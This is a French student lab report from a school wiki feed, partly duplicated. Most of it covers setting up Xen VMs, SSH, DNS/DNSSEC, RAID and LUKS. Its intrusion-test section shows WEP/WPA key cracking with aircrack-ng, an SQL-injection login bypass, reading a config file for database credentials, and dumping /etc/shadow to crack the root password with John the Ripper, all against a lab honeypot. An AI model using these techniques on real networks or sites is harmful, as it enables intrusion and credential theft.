Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
On ajoute à notre fichier named.conf.options les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
 dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version&lt;br /&gt;
 dnssec-validation yes; //FOrcer le dnssec&lt;br /&gt;
&lt;br /&gt;
On génère ensuite nos clés, dans un fichier connus&lt;br /&gt;
&lt;br /&gt;
 cd /etc/bind/master&lt;br /&gt;
 dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site &lt;br /&gt;
 //Kanosteke59.site.+007+15849&lt;br /&gt;
 dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site&lt;br /&gt;
 //Kanosteke59.site.+007+60636&lt;br /&gt;
&lt;br /&gt;
ici on crée une clé pour du SHA-1&lt;br /&gt;
ON peut ensuite renommer les fichiers &lt;br /&gt;
 &lt;br /&gt;
 mv Kanosteke59.site.+007+60636.key  Kanosteke59.site.ksk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+60636.private  Kanosteke59.site.ksk.private&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.key  Kanosteke59.site.zsk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.private  Kanosteke59.site.zsk.private&lt;br /&gt;
&lt;br /&gt;
On ajoute dans la fin de définition du domaine :&lt;br /&gt;
&lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 &lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 $INCLUDE Kanosteke59.site.zsk.key&lt;br /&gt;
 $INCLUDE Kanosteke59.site.ksk.key&lt;br /&gt;
&lt;br /&gt;
On signe maintenant nos fichier de définition&lt;br /&gt;
 dnssec-signzone -o anosteke59.site  -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk&lt;br /&gt;
&lt;br /&gt;
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé&lt;br /&gt;
 zone &amp;quot;anosteke59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/master/anosteke59.site.signed&amp;quot;;&lt;br /&gt;
         notify yes;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour démarrer, nous formatons la clé :&lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte &lt;br /&gt;
 cryptsetup luksOpen /dev/sdb crypte&lt;br /&gt;
Puis nous le formatons&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypte &lt;br /&gt;
&lt;br /&gt;
Nous montons ensuite la partition afin d'y ajouter un fichier test :&lt;br /&gt;
 mkdir /mnt/cryptUSB&lt;br /&gt;
 mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/&lt;br /&gt;
&lt;br /&gt;
Nous créons ce fichier test.txt en y inscrivant &amp;quot;BONJOUR MONDE !&amp;quot; :&lt;br /&gt;
 nano /mnt/cryptUSB/test.txt&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons et fermons le volume chiffré :&lt;br /&gt;
 umount /mnt/cryptUSB&lt;br /&gt;
 cryptsetup luksClose crypte&lt;br /&gt;
&lt;br /&gt;
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== WEP ===&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
=== WPA ===&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur &amp;quot;' or 1=1; --&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.&lt;br /&gt;
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.&amp;lt;br/&amp;gt;&lt;br /&gt;
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
2. PHPMyAdmin&lt;br /&gt;
&lt;br /&gt;
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19&lt;br /&gt;
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword &lt;br /&gt;
&lt;br /&gt;
3. Récupération de fichiers avec l'user rex&lt;br /&gt;
&lt;br /&gt;
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons lancé la commande :&lt;br /&gt;
 unshadow /etc/passwd /etc/shadow | head -1 &amp;gt; mdp&lt;br /&gt;
Nous avons obtenu un fichier avec le mot de passe root haché.&lt;br /&gt;
&lt;br /&gt;
5. Decryptage du mot de passe root avec John the Ripper&lt;br /&gt;
&lt;br /&gt;
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : &amp;quot;mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons créé un dictionnaire de mots de 4 lettres : &lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dict&lt;br /&gt;
&lt;br /&gt;
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : &lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
La dernière étape consistait à lancer JtR :&lt;br /&gt;
 john -w:dict mdp&lt;br /&gt;
Après 5 minutes d'attente, le mot de passe vu cracké.&amp;lt;br/&amp;gt;&lt;br /&gt;
Avec la commande : &lt;br /&gt;
 john --show mdp&lt;br /&gt;
On obtient le mot de passe : '''fortfort'''.&lt;br /&gt;
&lt;br /&gt;
=== ASR ===&lt;br /&gt;
&lt;br /&gt;
 xl create -c PRA-07.cfg&lt;br /&gt;
&lt;br /&gt;
 xen console PRA-07&lt;br /&gt;
&lt;br /&gt;
on ajoute dans /etc/network/interfaces :&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 172.26.145.107/24&lt;br /&gt;
  gateway 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Et on commente relatif au DHCP&lt;br /&gt;
on édite /etc/ssh/sshd_config :&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
on copie la clé publique de la zabeth dans /root/.ssh/authorized_key&lt;br /&gt;
&lt;br /&gt;
on install puthon3-venv sur la zabeth :&lt;br /&gt;
 apt install python3-venv&lt;br /&gt;
&lt;br /&gt;
on install ansible sur les zabeth :&lt;br /&gt;
 python3 -m venv ~/env-ansible&lt;br /&gt;
 . ~/env-ansible/bin/activate&lt;br /&gt;
 pip3 install -U setuptools wheel&lt;br /&gt;
 pip3 install -U ansible&lt;br /&gt;
&lt;br /&gt;
On édite le fichier inventory de ansible :&lt;br /&gt;
 ASR-07 ansible_ssh_host=&amp;quot;172.26.145.107&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Passons maintenant à la configuration de ansible :&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57905</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57905"/>
				<updated>2022-01-12T10:25:52Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* ASR */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
On ajoute à notre fichier named.conf.options les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
 dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version&lt;br /&gt;
 dnssec-validation yes; //FOrcer le dnssec&lt;br /&gt;
&lt;br /&gt;
On génère ensuite nos clés, dans un fichier connus&lt;br /&gt;
&lt;br /&gt;
 cd /etc/bind/master&lt;br /&gt;
 dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site &lt;br /&gt;
 //Kanosteke59.site.+007+15849&lt;br /&gt;
 dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site&lt;br /&gt;
 //Kanosteke59.site.+007+60636&lt;br /&gt;
&lt;br /&gt;
ici on crée une clé pour du SHA-1&lt;br /&gt;
ON peut ensuite renommer les fichiers &lt;br /&gt;
 &lt;br /&gt;
 mv Kanosteke59.site.+007+60636.key  Kanosteke59.site.ksk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+60636.private  Kanosteke59.site.ksk.private&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.key  Kanosteke59.site.zsk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.private  Kanosteke59.site.zsk.private&lt;br /&gt;
&lt;br /&gt;
On ajoute dans la fin de définition du domaine :&lt;br /&gt;
&lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 &lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 $INCLUDE Kanosteke59.site.zsk.key&lt;br /&gt;
 $INCLUDE Kanosteke59.site.ksk.key&lt;br /&gt;
&lt;br /&gt;
On signe maintenant nos fichier de définition&lt;br /&gt;
 dnssec-signzone -o anosteke59.site  -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk&lt;br /&gt;
&lt;br /&gt;
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé&lt;br /&gt;
 zone &amp;quot;anosteke59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
